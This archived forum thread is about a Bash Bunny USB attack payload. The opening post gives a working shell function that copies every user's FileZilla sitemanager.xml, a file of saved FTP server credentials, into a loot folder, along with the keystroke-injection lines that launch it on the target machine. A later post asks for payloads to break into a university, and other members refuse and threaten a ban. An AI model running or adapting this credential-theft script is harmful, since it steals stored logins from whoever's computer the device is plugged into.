quentin_lamamy Posted July 27, 2017 Share Posted July 27, 2017 Hi, I have a sh script that exfiltrate files from the computer : function filezilla.exfiltration(){ mkdir -p $1 echo "Run path : $1" >> $1/run.txt for d in /Users/*; do echo "User : $d" >> $1/run.txt if [ -d "$d" ]; then if [ -f "$d/.filezilla/sitemanager.xml" ]; then echo "sitemanager.xml detected" >> $1/run.txt cp $d/.filezilla/sitemanager.xml $1/$(basename $d)_sitemanager.xml else echo "no sitemanager.xml detected" >> $1/run.txt fi fi done } The argument is a loot folder When this script run in the terminal all works because /Users/ folder exist on the computer But when the BB call this function /Users refer to the BB filesystem. Is there a path i can use to refer to the computer filesystem and avoid using this script Q STRING source /Volumes/Bashbunny/payloads/$SWITCH_POSITION/exfiltration.sh Q ENTER Q STRING filezilla.exfiltration /Volumes/Bashbunny/payloads/$SWITCH_POSITION/ Q ENTER Thks Link to comment Share on other sites More sharing options...
SUiCiDE Posted December 18, 2017 Share Posted December 18, 2017 can u help with some payloads? i need get access in my university. thanks... Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted December 19, 2017 Share Posted December 19, 2017 As far as I know there's no way of giving the Bunny direct access to the PC's files as if the PC was the USB and the Bunny the host. The Bunny can run a program on the host machine and get it to access files from the Bunny, though. Lots of payloads do this (mainly PowerShell-based). So getting the host to push files to the Bunny is far easier than the Bunny pulling files from the host. Link to comment Share on other sites More sharing options...
b0N3z Posted December 19, 2017 Share Posted December 19, 2017 3 hours ago, SUiCiDE said: can u help with some payloads? i need get access in my university. thanks... did anybody else get this same message from this guy? Link to comment Share on other sites More sharing options...
Just_a_User Posted December 19, 2017 Share Posted December 19, 2017 5 hours ago, b0N3z said: did anybody else get this same message from this guy? Yeah he also arrived on IRC asking the same. I suggested he removed his comment as hacking his uni is most likely illegal and no one was likely going to help him on a public forum. Link to comment Share on other sites More sharing options...
b0N3z Posted December 19, 2017 Share Posted December 19, 2017 Yea wording is everything lol Link to comment Share on other sites More sharing options...
digininja Posted December 19, 2017 Share Posted December 19, 2017 21 hours ago, SUiCiDE said: can u help with some payloads? i need get access in my university. thanks... What you are asking is probably illegal where you are so please don't ask for help with it. Any more questions like this and you'll be banned. Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted December 20, 2017 Share Posted December 20, 2017 Keep it on topic, guys. No need to argue on something we already know the answer to. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.